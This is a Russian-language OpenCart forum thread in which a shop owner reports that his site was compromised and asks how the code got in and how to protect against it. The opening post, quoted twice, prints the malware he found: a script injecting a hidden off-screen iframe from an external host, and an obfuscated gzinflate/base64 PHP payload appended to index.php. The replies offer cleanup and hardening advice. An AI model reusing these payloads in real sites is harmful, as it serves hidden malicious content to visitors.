Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Взлом сайта на opencart 1.5.3.1


newPlayer

Recommended Posts

Доброго,

Столкнулся со следующей проблемой. Примерно, через две недели после размещения сайта на реальном хостинге, заметил, что на странице сместился div с footer`ом. Пробежался по коду страницы и в самом конце нашел левый скрипт:

<script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id=\'Twitter\'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>

В корневом index.php нашел новый код – тоже в самом конце страницы:

#c3284d#
echo(gzinflate(base64_decode("VVFNU4NADL13pv9hb0vHCizQBSrtTHU8ePLizTrMfoR2lQJd0g//vUBrR3NL8pL38pK1ypoGl+PRUViS78mC6FoddlChqywIhOcS+syhprBiB3QyHY9IF3nVYWkLu
EK0Rh4Q6MN4lO/f8+rDoa1VdEroFrGZex6eDCJYV1ftp4GzcfFrzsIo8NATAUtlwWfSD+Us4b4/U1wkEHPO/SDhgk6GrW6L3yW4Td0aNPVALWRblzfaK+BkNG77LvOb819Bg3hZWw22E1aJo9kIrK17aMGu
Nv25ptJwfi0cGkQpkypVsU7ikAETEIYsiPw0lCr2A04n5I6wf7pKKLBnvedBFF+IbzaerEFwaKbNkRi9WNO3ixtrusy8rrgcTrzBN4BXyx+/X7Tzi6YTVzQNVPppa0rt5Pt+KPOu7/sB")));
#/c3284d#
?>

Удалил – стало все ок.

Вопрос: каким образом добавился код в index.php (я читал про sql-инъекции, но не особо в этом разбераюсь), а главное – как защититься от этого.

Буду признателен любой помощи.

Сайт на opencart 1.5.3.1. В качестве шаблона используются hyla (правда, я там много чего переделал). Также используется simple ajax search.

Надіслати
Поділитися на інших сайтах


Доброго,

Столкнулся со следующей проблемой. Примерно, через две недели после размещения сайта на реальном хостинге, заметил, что на странице сместился div с footer`ом. Пробежался по коду страницы и в самом конце нашел левый скрипт:

<script>
var _q = document.createElement('iframe'),
	_n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id='Twitter'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>

В корневом index.php нашел новый код – тоже в самом конце страницы:

#c3284d#
echo(gzinflate(base64_decode("VVFNU4NADL13pv9hb0vHCizQBSrtTHU8ePLizTrMfoR2lQJd0g//vUBrR3NL8pL38pK1ypoGl+PRUViS78mC6FoddlChqywIhOcS+syhprBiB3QyHY9IF3nVYWkLu
EK0Rh4Q6MN4lO/f8+rDoa1VdEroFrGZex6eDCJYV1ftp4GzcfFrzsIo8NATAUtlwWfSD+Us4b4/U1wkEHPO/SDhgk6GrW6L3yW4Td0aNPVALWRblzfaK+BkNG77LvOb819Bg3hZWw22E1aJo9kIrK17aMGu
Nv25ptJwfi0cGkQpkypVsU7ikAETEIYsiPw0lCr2A04n5I6wf7pKKLBnvedBFF+IbzaerEFwaKbNkRi9WNO3ixtrusy8rrgcTrzBN4BXyx+/X7Tzi6YTVzQNVPppa0rt5Pt+KPOu7/sB")));
#/c3284d#
?>

Удалил – стало все ок.

Вопрос: каким образом добавился код в index.php (я читал про sql-инъекции, но не особо в этом разбераюсь), а главное – как защититься от этого.

Буду признателен любой помощи.

Сайт на opencart 1.5.3.1. В качестве шаблона используются hyla (правда, я там много чего переделал). Также используется simple ajax search.

Задайте этот вопрос службе поддержке Вашего хостинга, причин может быть несколько:

- слишком простые пароли доступа к хостингу (обычно подбирают FTP пароль)

- шаред-хостинг со всеми вытекающими последствиями

Мало вероятно, что взлом был через движок магазина (если только Вы не использовали шаблон/модуль скаченный непонятно где), за OpenCart замечено не было, если б было то уже раструбили бы на всех углах.

Надіслати
Поділитися на інших сайтах

Спасибо за совет. Сменил ключ шифрования - не помогло (атака через 2 дня повторилась). Сейчас поменял пароль к фтп, залил .htaccess в папку "download".

Скажите, а каким вообще образом добавляется код в файл index.php? Из модулей (помимо поиска на яксе) я еще ставил новости (скачивал вроде с =^_^=) - каким образом взламывают через модули? И может ли это быть действием вируса?

  • +1 1
Надіслати
Поділитися на інших сайтах


=^_^= был неоднократно замечен в распространении шаблонов со скрытыми ссылками на себя, может вы оттуда подцепили какую-то гадость? У меня этот ресурс никогда не вызывал доверия.

  • +1 1
Надіслати
Поділитися на інших сайтах

RGB

И как с этой гадостью бороться? Удаления файлов модуля хватит? Мне бы вообще понять, как механизм по добавлению кода в index.php работает.

А где хостинг то? Кто хостер?
Надіслати
Поділитися на інших сайтах

Я бы на твоем месте сделал бекап, удалил с фтп абсолютно все файлы (большая вероятность, что шелл там залит не один), поставил голый опенкарт (проверь chmod) и импортировал бд.

Надіслати
Поділитися на інших сайтах


Я бы на твоем месте сделал бекап, удалил с фтп абсолютно все файлы (большая вероятность, что шелл там залит не один), поставил голый опенкарт (проверь chmod) и импортировал бд.

Думаю так и сделать. А что такое шелл?

Надіслати
Поділитися на інших сайтах


  • 3 months later...
  • 3 weeks later...

По поводу безопасности много написали на форуме ОК.

1. использовать антивирус и фаервол на компе.

2. безопасное соединение с фтп (sftp)

3. на самом сервере переименовать папку admin в другую, напримен my_adm1n

4. снять расширение с .htaccess.txt и заменить (или добавить) имеющийся. там уже от ОК прописаны вещи, необходимые для безопасности.

5. самый уязвимый момент для ОК - вход в админку, когда пароль передается в открытом виде. если вас прослушивают между серваком и компом - не поможет вирь и фаер, пакеты перехватываются.

тут только можно добавить головной боли хацкерам - использовать в апаче инструмент htdigest с дополнительной директивой, которая устанавливает временное ограничение на работу времени аутентификации. не панацея, ибо не SSL/TSL. но если по карману сертификат - лечше всего с ним дружить.

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.